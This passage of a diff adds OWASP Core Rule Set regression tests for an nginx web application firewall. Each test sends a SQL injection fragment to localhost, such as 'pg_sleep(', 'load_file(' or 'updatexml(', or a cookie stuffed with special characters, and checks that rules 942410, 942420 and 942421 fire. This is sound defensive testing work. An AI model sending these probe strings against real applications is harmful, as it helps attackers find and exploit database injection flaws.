+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=LENGTH%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-54
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ 
data: "pay=ln+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-55 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=ln%29+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-56 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=load_file%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-57 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=local%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-58 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=log%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-59 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + 
port: 80
+ uri: "/"
+ data: "pay=log%26%26%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-60
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=lower%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-61
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=MAKE_SET%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-62
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=MAX%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-63
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=md5%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-64
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=md5%5C%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-65
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=MID%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-66
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=minute+%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-67
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=month%3D%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-68
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "name_const("
+ version: HTTP/1.0
+ output:
+ log_contains: id "942410"
+ - test_title: 942410-69
+ desc: "SQL Injection Attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP 
CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "now(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-70 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "nOW(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-71 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "ord(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-72 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "password?(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-73 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "password/?(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-74 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS 
test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "Password>$(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-75 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pg_sleep(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-76 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pi(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-77 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "PI(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-78 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pow(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-79 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test 
agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "POW(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-80 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "quarter. (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-81 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "rand(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-82 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "Rand (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-83 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "RAND(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-84 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "replace(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-85 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "REPLACE(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-86 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "round (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-87 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "round(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-88 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "rtrim(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-89 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "RTRIM(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-90 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=sin (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-91 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SIN(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-92 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=sleep(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-93 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SLEEP (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-94 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=strcmp(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-95 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=substr(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-96 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SUBSTR(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-97 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=substring(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-98 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SUBSTRING(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-99 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS 
test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=sysdate(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-100 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "time (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-101 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=time%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-102 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=trim%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-103 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=Uncompress+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-104 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + 
User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=unhex%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-105 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=uNhEx%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-106 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=updatexml%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-107 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=UpdateXML%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-108 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=UPPER%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-109 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 
127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=user+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-110 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=user%2F%3F%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-111 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=user%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-112 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=values+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-113 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=VALUES%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-114 + desc: "SQL Injection Attack" + stages: 
+ - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=version%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-115 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=version%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-116 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=xmltype%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-117 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=XMLType%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-118 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=year%5D%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" 
diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml new file mode 100644 index 00000000..22f57a31 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml @@ -0,0 +1,24 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942420.yaml +tests: + - test_title: 942420-1 + desc: "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (8)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Cookie: "ar=%7e%7e%7e%7e%7e%7e%7e%7e%7e&foo=var" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + version: HTTP/1.0 + output: + log_contains: id "942420" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml new file mode 100644 index 00000000..75ed809f --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml @@ -0,0 +1,24 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942421.yaml +tests: + - test_title: 942421-1 + desc: "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (3)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Cookie: "cookie=@@@@@@@@@@@@@" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/" + version: HTTP/1.0 + output: + log_contains: id "942421" 
